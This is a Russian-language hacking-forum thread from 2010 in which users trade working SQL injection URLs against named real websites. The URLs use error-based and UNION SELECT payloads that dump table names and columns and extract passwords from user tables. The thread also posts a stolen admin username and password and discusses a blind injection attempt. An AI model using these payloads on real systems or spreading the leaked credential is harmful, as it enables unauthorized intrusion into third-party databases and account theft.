ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.03.2010, 16:47
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
скриптом каким нить сдампи структуру.
Как это сделать?
|
|
|
13.03.2010, 17:05
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от CyberHunter
Как это сделать?
SIPT/Toolza
|
|
|
|
13.03.2010, 17:30
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от ILYAtirtir
Ну они там и есть,делается вот так:
Ну они там и есть,делается вот так:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
Дальше через лимит.Можно не перебирать а сделать вот так:
select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/and/**/column_name/**/LIKE/**/'%pass%'
Код:
SQL/DB Error -- [Duplicate entry 'Password1' for key 1]
ну эт для вывода имена колонок, а я не могу вывести то что на этих колонках, тоесть тот пасс с колонки Password
так в принцыпе должно было выводит нужное инфо
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/Password/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_tame='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
|
|
|
|
13.03.2010, 18:09
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от CyberHunter
Подскажите как сделать чтобы отобразились названия сразу всех таблиц?
Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+
Но как-то не найс через лимит по одной смотреть.
так можеш выводит имена всех таблиц за раз
http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20 concat(0x3078,Hex(cast(group_concat(table_name)%20 as%20char)))%20FROM%20information_schema.tables%20 Where%20table_schema=0x6631776F726C64),3,4,5,6,7,8 ,9,10,11,12--
а так для вывода всех колонок с таблицы users за 1 запрос
http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20 concat(0x3078,Hex(cast(group_concat(column_name)%2 0as%20char)))%20FROM%20information_schema.columns% 20Where%20table_schema=0x6631776F726C64%20AND%20ta ble_name=0x7573657273),3,4,5,6,7,8,9,10,11,12--
Последний раз редактировалось YuNi|[c; 13.03.2010 в 18:13..
|
|
|
|
13.03.2010, 18:18
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
а кстати вот и админ adminn:mikahakka
|
|
|
|
13.03.2010, 18:19
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
Есть слепая инъекция
SQL запрос:
Код:
SELECT o.id_object FROM attributes a LEFT JOIN pro_ado_objects o ON a.id=o.id_attr WHERE a.control_type IN ('text', 'textarea') AND o.value LIKE '%%' +and+ascii(substring((SELECT login from user),1,1))>1#A%' GROUP BY o.id_object
Выдает ошибку Subquery returns more than 1 row
Есть какие то ещё варианты получить данные из таблицы?
Вывод ошибок отключен! |
|
|
|
13.03.2010, 18:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от FAQ666
Вывод ошибок отключен!
Сообщение от FAQ666
Выдает ошибку Subquery returns more than 1 row
мда)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
13.03.2010, 18:36
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
А что мда? Ошибка такая. Но вывод ошибок отключен.
|
|
|
|
13.03.2010, 18:48
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от FAQ666
А что мда? Ошибка такая. Но вывод ошибок отключен.
Ссылку дай и не тупи))) Subquery returns more than 1 row - это и есть вывод ошибки
|
|
|
|
13.03.2010, 18:55
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от FAQ666
Есть слепая инъекция
SQL запрос:
Код:
SELECT o.id_object FROM attributes a LEFT JOIN pro_ado_objects o ON a.id=o.id_attr WHERE a.control_type IN ('text', 'textarea') AND o.value LIKE '%%' +and+ascii(substring((SELECT login from user),1,1))>1#A%' GROUP BY o.id_object
Выдает ошибку Subquery returns more than 1 row
Есть какие то ещё варианты получить данные из таблицы?
Вывод ошибок отключен! если ссылку не в студию что тут гадать бум чтол что там
|
|
|
|
|
|
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Линейный вид
